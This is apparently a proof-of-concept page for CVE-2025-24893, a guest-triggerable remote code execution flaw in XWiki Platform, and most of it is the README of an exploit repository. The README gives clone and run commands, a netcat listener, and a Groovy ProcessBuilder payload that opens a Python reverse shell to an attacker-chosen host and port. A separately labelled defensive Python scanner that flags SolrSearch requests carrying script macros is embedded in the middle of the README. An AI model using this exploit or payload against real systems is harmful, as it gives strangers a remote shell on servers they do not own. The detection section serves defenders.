PoC details: 35b241f6d36b3cf693dc9631fa33e0e9551e1464

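Source
Related vulnerability
Title: XWiki Platform security vulnerability (CVE-2025-24893)
Description: XWiki Platform is an open-source wiki platform from XWiki for building collaborative web applications. XWiki Platform contains a security vulnerability: any guest user can cause remote code execution through a request to SolrSearch.
Description
Modified exploit for CVE-2025-24893
Introduction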
# CVE-2025-24893 XWiki RCE Exploit

![Exploit Banner](https://img.shields.io/badge/CVE-2025--24893-critical)

A simple Python3 script to exploit **CVE-2025-24893**, a remote code execution vulnerability in XWiki Platform, using a Groovy-based async macro and a configurable reverse shell payload.

> **⚠️ WARNING:** This tool is provided **for educational and authorized testing purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

---

## Table of Contents

- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Detection & Protocol Fallback](#detection--protocol-fallback)
- [Reverse Shell Payload](#reverse-shell-payload)
- [License](#license)
- [Disclaimer](#disclaimer)

---

## Features

- ✅ Automatically detects whether the target supports HTTPS or HTTP  
- ✅ Constructs a Groovy `ProcessBuilder` snippet to avoid `Runtime.exec` quirks  
- ✅ URL-encodes the XWiki async+groovy macro payload  
- ✅ Configurable reverse shell (host + port)  
- ✅ Prints HTTP response code to help verify delivery  
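
Seen from the defending side, the request this list describes stands out in web access logs: a SolrSearch request whose query string decodes to an XWiki script macro. The Python check below is an added example, not part of this repository's `exploit.py`; the log lines are constructed, and the `/xwiki/bin/get/Main/SolrSearch` path and `text` parameter in them are assumptions about the deployment.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format line: client IP ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# XWiki script-macro openers that have no place in a search term.
MACRO_RE = re.compile(r'\{\{\s*/?\s*(groovy|async|velocity|python)\b', re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_solrsearch(line):
    """Return a finding dict for a SolrSearch request carrying a macro, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if "solrsearch" not in fully_decode(path).lower():
        return None
    hit = MACRO_RE.search(fully_decode(query))  # parameter-agnostic on purpose
    if not hit:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "macro": hit.group(1).lower()}

def scan(lines):
    return [f for f in map(suspicious_solrsearch, lines) if f]

# Constructed sample lines (not from a real server); macro bodies are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=meeting+notes HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Mar/2025:10:00:05 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%7B%7Basync%7D%7D%7B%7Bgroovy%7D%7DPLACEHOLDER%7B%7B%2Fgroovy%7D%7D HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Mar/2025:10:00:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%257B%257Bgroovy%257D%257DPLACEHOLDER HTTP/1.1" 200 790',
    '203.0.113.7 - - [01/Mar/2025:10:00:12 +0000] "GET /xwiki/bin/view/Main/?q=%7B%7Bgroovy%7D%7D HTTP/1.1" 200 3001',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A match only shows that the request was received; whether the macro executed depends on the XWiki version, so treat hits from unauthenticated clients as a prompt to check patch level and outbound connections from the wiki host.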

---

## Requirements

- Python 3.6 or higher  
- [`requests`](https://pypi.org/project/requests/) library  

```bash
pip install requests
```

---

## Installation

Clone this repository:

```bash
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
```
---

## Usage

```bash
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
```

* `<TARGET_DOMAIN>`
  The XWiki host (e.g. `wiki.example.local`).

* `<LHOST>`
  Your attacker machine’s IP (where your listener is running).

* `<LPORT>`
  Your listener port (integer).

---

### Example

1. Start a listener on your machine:

```bash
nc -lvnp 4444
```

2. Run the exploit:

```bash
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
```

3. On success, check your `netcat` listener for a shell.

---

## Detection & Protocol Fallback

Before sending the payload, the script:

1. Tries `https://<TARGET_DOMAIN>`
2. Falls back to `http://<TARGET_DOMAIN>` if HTTPS fails
3. Exits if neither is reachable

This helps ensure compatibility with mixed‐protocol deployments.

---

## Reverse Shell Payload

By default, the script uses a Python3 one-liner:

```groovy
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
```

* You can modify the `build_payload()` function if you need a different shell (e.g. Bash, Perl, PHP, etc.).

---

## License

This project is licensed under the **MIT License**. See the [LICENSE](LICENSE) file for details.

---

## Disclaimer

This tool is designed for **authorized security assessment** and **educational purposes** only. The authors hold no responsibility for misuse. Always obtain explicit permission before testing any target systems.
File snapshot

[4.0K] /data/pocs/35b241f6d36b3cf693dc9631fa33e0e9551e1464
├── [2.6K] exploit.py
├── [1.0K] LICENSE
└── [3.0K] README.md

0 directories, 3 files